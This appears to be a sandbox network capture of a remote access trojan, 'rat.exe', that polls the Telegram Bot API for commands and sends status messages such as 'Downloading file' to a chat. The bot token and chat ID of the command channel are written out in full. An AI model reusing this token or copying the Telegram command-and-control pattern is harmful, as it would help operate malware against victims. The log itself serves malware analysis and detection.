GET /bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506707 HTTP/1.1
Host: api.telegram.org

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0
Date: Sun, 12 Jan 2025 11:18:28 GMT
Content-Type: application/json
Content-Length: 23
Connection: keep-alive
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
GET

https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506708

rat.exe

Remote address:

149.154.167.220:443

Request

GET /bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506708 HTTP/1.1
Host: api.telegram.org

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0
Date: Sun, 12 Jan 2025 11:18:29 GMT
Content-Type: application/json
Content-Length: 23
Connection: keep-alive
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
GET

https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506709

rat.exe

Remote address:

149.154.167.220:443

Request

GET /bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506709 HTTP/1.1
Host: api.telegram.org

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0
Date: Sun, 12 Jan 2025 11:18:31 GMT
Content-Type: application/json
Content-Length: 23
Connection: keep-alive
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
GET

https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506710

rat.exe

Remote address:

149.154.167.220:443

Request

GET /bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506710 HTTP/1.1
Host: api.telegram.org

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0
Date: Sun, 12 Jan 2025 11:18:32 GMT
Content-Type: application/json
Content-Length: 23
Connection: keep-alive
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
GET

https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506711

rat.exe

Remote address:

149.154.167.220:443

Request

GET /bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506711 HTTP/1.1
Host: api.telegram.org

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0
Date: Sun, 12 Jan 2025 11:18:33 GMT
Content-Type: application/json
Content-Length: 583
Connection: keep-alive
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
GET

https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/sendMessage?chat_id=-4791200354&text=%F0%9F%93%84%20Downloading%20file%20%22file%22%20from%20url

rat.exe

Remote address:

149.154.167.220:443

Request

GET /bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/sendMessage?chat_id=-4791200354&text=%F0%9F%93%84%20Downloading%20file%20%22file%22%20from%20url HTTP/1.1
Host: api.telegram.org

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0
Date: Sun, 12 Jan 2025 11:18:33 GMT
Content-Type: application/json
Content-Length: 296
Connection: keep-alive
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
GET

https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/sendMessage?chat_id=-4791200354&text=%F0%9F%92%A5%20Connection%20error

rat.exe

Remote address:

149.154.167.220:443

Request

GET /bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/sendMessage?chat_id=-4791200354&text=%F0%9F%92%A5%20Connection%20error HTTP/1.1
Host: api.telegram.org

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0
Date: Sun, 12 Jan 2025 11:18:33 GMT
Content-Type: application/json
Content-Length: 278
Connection: keep-alive
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
GET

https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506645

rat.exe

Remote address:

149.154.167.220:443

Request

GET /bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506645 HTTP/1.1
Host: api.telegram.org

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0
Date: Sun, 12 Jan 2025 11:18:34 GMT
Content-Type: application/json
Content-Length: 23
Connection: keep-alive
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
GET

https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506646

rat.exe

Remote address:

149.154.167.220:443

Request

GET /bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506646 HTTP/1.1
Host: api.telegram.org

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0
Date: Sun, 12 Jan 2025 11:18:35 GMT
Content-Type: application/json
Content-Length: 23
Connection: keep-alive
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
GET

https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506647

rat.exe

Remote address:

149.154.167.220:443

Request

GET /bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506647 HTTP/1.1
Host: api.telegram.org

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0
Date: Sun, 12 Jan 2025 11:18:36 GMT
Content-Type: application/json
Content-Length: 23
Connection: keep-alive
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
GET

https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506648

rat.exe

Remote address:

149.154.167.220:443

Request

GET /bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506648 HTTP/1.1
Host: api.telegram.org

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0
Date: Sun, 12 Jan 2025 11:18:37 GMT
Content-Type: application/json
Content-Length: 23
Connection: keep-alive
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
GET

https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506649

rat.exe

Remote address:

149.154.167.220:443

Request

GET /bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506649 HTTP/1.1
Host: api.telegram.org

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0
Date: Sun, 12 Jan 2025 11:18:38 GMT
Content-Type: application/json
Content-Length: 23
Connection: keep-alive
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
GET

https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506650

rat.exe

Remote address:

149.154.167.220:443

Request

GET /bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506650 HTTP/1.1
Host: api.telegram.org

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0
Date: Sun, 12 Jan 2025 11:18:39 GMT
Content-Type: application/json
Content-Length: 23
Connection: keep-alive
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
GET

https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506651

rat.exe

Remote address:

149.154.167.220:443

Request

GET /bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506651 HTTP/1.1
Host: api.telegram.org

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0
Date: Sun, 12 Jan 2025 11:18:40 GMT
Content-Type: application/json
Content-Length: 23
Connection: keep-alive
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
GET

https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506652

rat.exe

Remote address:

149.154.167.220:443

Request

GET /bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506652 HTTP/1.1
Host: api.telegram.org

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0
Date: Sun, 12 Jan 2025 11:18:41 GMT
Content-Type: application/json
Content-Length: 23
Connection: keep-alive
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
GET

https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506653

rat.exe

Remote address:

149.154.167.220:443

Request

GET /bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506653 HTTP/1.1
Host: api.telegram.org

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0
Date: Sun, 12 Jan 2025 11:18:42 GMT
Content-Type: application/json
Content-Length: 23
Connection: keep-alive
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
GET

https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506654

rat.exe

Remote address:

149.154.167.220:443

Request

GET /bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506654 HTTP/1.1
Host: api.telegram.org

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0
Date: Sun, 12 Jan 2025 11:18:43 GMT
Content-Type: application/json
Content-Length: 23
Connection: keep-alive
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
GET

https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506655

rat.exe

Remote address:

149.154.167.220:443

Request

GET /bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506655 HTTP/1.1
Host: api.telegram.org

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0
Date: Sun, 12 Jan 2025 11:18:44 GMT
Content-Type: application/json
Content-Length: 23
Connection: keep-alive
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
GET

https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506656

rat.exe

Remote address:

149.154.167.220:443

Request

GET /bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506656 HTTP/1.1
Host: api.telegram.org

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0
Date: Sun, 12 Jan 2025 11:18:45 GMT
Content-Type: application/json
Content-Length: 23
Connection: keep-alive
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
GET

https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506657

rat.exe

Remote address:

149.154.167.220:443

Request

GET /bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506657 HTTP/1.1
Host: api.telegram.org

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0
Date: Sun, 12 Jan 2025 11:18:46 GMT
Content-Type: application/json
Content-Length: 23
Connection: keep-alive
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
GET

https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506658

rat.exe

Remote address:

149.154.167.220:443

Request

GET /bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506658 HTTP/1.1
Host: api.telegram.org

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0
Date: Sun, 12 Jan 2025 11:18:48 GMT
Content-Type: application/json
Content-Length: 23
Connection: keep-alive
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
GET

https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506659

rat.exe

Remote address:

149.154.167.220:443

Request

GET /bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506659 HTTP/1.1
Host: api.telegram.org

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0
Date: Sun, 12 Jan 2025 11:18:49 GMT
Content-Type: application/json
Content-Length: 23
Connection: keep-alive
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
GET

https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506660

rat.exe

Remote address:

149.154.167.220:443

Request

GET /bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506660 HTTP/1.1
Host: api.telegram.org

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0
Date: Sun, 12 Jan 2025 11:18:50 GMT
Content-Type: application/json
Content-Length: 23
Connection: keep-alive
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
GET

https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506661

rat.exe

Remote address:

149.154.167.220:443

Request

GET /bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506661 HTTP/1.1
Host: api.telegram.org

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0
Date: Sun, 12 Jan 2025 11:18:51 GMT
Content-Type: application/json
Content-Length: 23
Connection: keep-alive
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
GET

https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506662

rat.exe

Remote address:

149.154.167.220:443

Request

GET /bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506662 HTTP/1.1
Host: api.telegram.org

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0
Date: Sun, 12 Jan 2025 11:18:52 GMT
Content-Type: application/json
Content-Length: 23
Connection: keep-alive
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
GET

https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506663

rat.exe

Remote address:

149.154.167.220:443

Request

GET /bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506663 HTTP/1.1
Host: api.telegram.org

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0
Date: Sun, 12 Jan 2025 11:18:53 GMT
Content-Type: application/json
Content-Length: 23
Connection: keep-alive
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
GET

https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506664

rat.exe

Remote address:

149.154.167.220:443

Request

GET /bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506664 HTTP/1.1
Host: api.telegram.org

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0
Date: Sun, 12 Jan 2025 11:18:55 GMT
Content-Type: application/json
Content-Length: 23
Connection: keep-alive
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
GET

https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506665

rat.exe

Remote address:

149.154.167.220:443

Request

GET /bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506665 HTTP/1.1
Host: api.telegram.org

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0
Date: Sun, 12 Jan 2025 11:18:56 GMT
Content-Type: application/json
Content-Length: 23
Connection: keep-alive
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
GET

https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506666

rat.exe

Remote address:

149.154.167.220:443

Request

GET /bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506666 HTTP/1.1
Host: api.telegram.org

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0
Date: Sun, 12 Jan 2025 11:18:57 GMT
Content-Type: application/json
Content-Length: 23
Connection: keep-alive
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
GET

https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506667

rat.exe

Remote address:

149.154.167.220:443

Request

GET /bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506667 HTTP/1.1
Host: api.telegram.org

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0
Date: Sun, 12 Jan 2025 11:18:59 GMT
Content-Type: application/json
Content-Length: 23
Connection: keep-alive
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
GET

https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506668

rat.exe

Remote address:

149.154.167.220:443

Request

GET /bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506668 HTTP/1.1
Host: api.telegram.org

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0
Date: Sun, 12 Jan 2025 11:19:00 GMT
Content-Type: application/json
Content-Length: 23
Connection: keep-alive
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
GET

https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506669

rat.exe

Remote address:

149.154.167.220:443

Request

GET /bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506669 HTTP/1.1
Host: api.telegram.org

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0
Date: Sun, 12 Jan 2025 11:19:01 GMT
Content-Type: application/json
Content-Length: 23
Connection: keep-alive
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
GET

https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506670

rat.exe

Remote address:

149.154.167.220:443

Request

GET /bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506670 HTTP/1.1
Host: api.telegram.org

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0
Date: Sun, 12 Jan 2025 11:19:02 GMT
Content-Type: application/json
Content-Length: 23
Connection: keep-alive
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
GET

https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506671

rat.exe

Remote address:

149.154.167.220:443

Request

GET /bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506671 HTTP/1.1
Host: api.telegram.org

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0
Date: Sun, 12 Jan 2025 11:19:03 GMT
Content-Type: application/json
Content-Length: 23
Connection: keep-alive
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
GET

https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506672

rat.exe

Remote address:

149.154.167.220:443

Request

GET /bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506672 HTTP/1.1
Host: api.telegram.org

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0
Date: Sun, 12 Jan 2025 11:19:04 GMT
Content-Type: application/json
Content-Length: 23
Connection: keep-alive
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
GET

https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506673

rat.exe

Remote address:

149.154.167.220:443

Request

GET /bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506673 HTTP/1.1
Host: api.telegram.org

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0
Date: Sun, 12 Jan 2025 11:19:05 GMT
Content-Type: application/json
Content-Length: 23
Connection: keep-alive
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
GET

https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506674

rat.exe

Remote address:

149.154.167.220:443

Request

GET /bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506674 HTTP/1.1
Host: api.telegram.org

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0
Date: Sun, 12 Jan 2025 11:19:06 GMT
Content-Type: application/json
Content-Length: 23
Connection: keep-alive
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
GET

https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506675

rat.exe

Remote address:

149.154.167.220:443

Request

GET /bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506675 HTTP/1.1
Host: api.telegram.org

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0
Date: Sun, 12 Jan 2025 11:19:07 GMT
Content-Type: application/json
Content-Length: 23
Connection: keep-alive
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
GET

https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506676

rat.exe

Remote address:

149.154.167.220:443

Request

GET /bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506676 HTTP/1.1
Host: api.telegram.org

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0
Date: Sun, 12 Jan 2025 11:19:09 GMT
Content-Type: application/json
Content-Length: 23
Connection: keep-alive
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
GET

https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506677

rat.exe

Remote address:

149.154.167.220:443

Request

GET /bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506677 HTTP/1.1
Host: api.telegram.org

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0
Date: Sun, 12 Jan 2025 11:19:10 GMT
Content-Type: application/json
Content-Length: 23
Connection: keep-alive
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST, OPTIONS
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
GET

https://api.telegram.org/bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506678

rat.exe

Remote address:

149.154.167.220:443

Request

GET /bot8014667160:AAFqSbz3GwG_v0L0NNlpN0dSG5-tCdm4TtY/getUpdates?offset=972506678 HTTP/1.1
Host: api.telegram.org

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0
Date: Sun, 12 Jan 2025 11:19:11 GMT
Content-Type: application/json
